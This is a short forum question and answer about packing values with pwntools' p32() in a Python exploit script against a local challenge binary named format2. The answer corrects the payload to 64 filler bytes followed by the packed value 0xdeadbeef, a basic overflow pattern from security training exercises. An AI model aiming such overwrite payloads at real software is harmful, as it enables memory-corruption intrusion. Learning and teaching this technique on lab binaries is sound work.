# How to Pack a variable with p32() ik python?

Tags: exploit, pwntools

I would like to pack a variable and also multiply it .But i can't did it properly can anyone help me to fix it

from pwn import *

p= process (./format2)

target = "deadbeef"

payload = p32("A"*64)

payload += p32(target)

p.sendline(payload)
p.interactive()

Answer (score 0):

Your payload should be:

```py
payload = b"A" * 64 + p32(0xdeadbeef)
```

p8, p32 and p64 should have a **non-negative integer type** data as argument. For example:

```py
p8(22), p32(11), p64(0xdead)
```